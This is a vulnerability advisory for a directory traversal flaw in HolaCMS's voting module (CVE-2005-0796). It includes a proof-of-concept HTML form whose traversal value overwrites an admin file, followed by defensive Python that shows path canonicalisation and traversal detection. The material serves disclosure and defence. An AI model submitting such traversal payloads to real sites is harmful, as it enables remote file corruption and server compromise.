HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability
BID:12799
Info
| Bugtraq ID: | 12799 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-0796 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 13 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery is credited to Virginity Security. |
| Vulnerable: | Hola HolaCMS 1.4.9-1, Hola HolaCMS 1.4.9, Hola HolaCMS 1.4.8, Hola HolaCMS 1.4.7, Hola HolaCMS 1.4.6, Hola HolaCMS 1.4.5, Hola HolaCMS 1.4.4, Hola HolaCMS 1.4.3, Hola HolaCMS 1.4.2a, Hola HolaCMS 1.4.2, Hola HolaCMS 1.4.1, Hola HolaCMS 1.4, Hola HolaCMS 1.2.10, Hola HolaCMS 1.2.9 |
| Not Vulnerable: | |
Discussion
HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server.
This issue is similar to the vulnerability described in BID 12789 (HolaCMS Voting Module Remote File Corruption Vulnerability). It is reported that HolaCMS 1.4.9-1, which was released to address the issue in BID 12789, is still vulnerable to a variant of that issue.
Specifically, an attacker can bypass the fix introduced in HolaCMS 1.4.9-1 by including directory traversal sequences in the path to a target file.
HolaCMS 1.4.9-1 and prior versions are affected by this issue.
Exploit / POC
The following example was provided using a form to submit a custom HTTP POST to the site:
<form action="http://www.example.com/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>
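The form above shows why a check on the raw `vote_filename` string is not enough: the value genuinely begins with `holaDB/votes/`, and the `../..` segments only take effect when the filesystem resolves the path. The following is an added example (not HolaCMS code, and not the vendor's fix) of the validation a defender would apply instead: canonicalise the path and require the result to stay inside the votes directory. It also includes a small log-side helper that flags traversal sequences in a submitted value even when they are URL-encoded. The web root `/srv/hola-example`, the poll file name `poll1.txt` and the function names are assumptions made for the example; the traversal value is the one from the proof of concept.

```python
import os
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Value taken from the advisory's proof-of-concept form
TRAVERSAL_VALUE = "holaDB/votes/../../admin/multiuser/multiuser.php"
# Constructed benign value for comparison (file name is an assumption)
BENIGN_VALUE = "holaDB/votes/poll1.txt"
# Constructed web root used for the example
WEBROOT = "/srv/hola-example"


def naive_is_allowed(vote_filename: str) -> bool:
    """A string-prefix check. This is the kind of validation that
    traversal sequences walk around: the advisory's payload really does
    start with the expected directory, so it is accepted."""
    return vote_filename.startswith("holaDB/votes/")


def resolve_vote_file(webroot: str, vote_filename: str) -> Optional[Path]:
    """Hardened check: canonicalise and confine.

    Returns the resolved path of the vote file, or None if the value is
    absolute, contains a NUL byte, resolves outside the votes directory,
    or names the votes directory itself rather than a file in it.
    """
    if "\x00" in vote_filename or os.path.isabs(vote_filename):
        return None
    votes_dir = (Path(webroot) / "holaDB" / "votes").resolve()
    candidate = (Path(webroot) / vote_filename).resolve()
    # Both sides were resolved the same way, so comparing the canonical
    # prefix catches '..' segments as well as symlinks out of the tree.
    try:
        inside = os.path.commonpath([str(votes_dir), str(candidate)]) == str(votes_dir)
    except ValueError:
        # Raised when the two paths cannot share a prefix at all
        return None
    if not inside or candidate == votes_dir:
        return None
    return candidate


def looks_like_traversal(raw_value: str, max_decode_rounds: int = 3) -> bool:
    """Detection helper for request logs or WAF rules: decode the value
    (repeatedly, to catch double encoding) and report whether any path
    segment is '..'. Both '/' and '\\' are treated as separators."""
    value = raw_value
    for _ in range(max_decode_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    segments = value.replace("\\", "/").split("/")
    return any(seg == ".." for seg in segments)


if __name__ == "__main__":
    for label, val in (("traversal", TRAVERSAL_VALUE), ("benign", BENIGN_VALUE)):
        print(f"{label}: naive={naive_is_allowed(val)} "
              f"hardened={resolve_vote_file(WEBROOT, val)} "
              f"flagged={looks_like_traversal(val)}")
```

The hardened function deliberately resolves the votes directory and the candidate with the same procedure before comparing them, so a symlinked web root does not produce a false rejection; the detection helper is independent of the filesystem and can be run over captured POST parameters.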
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
References:
- Hola CMS (Hola)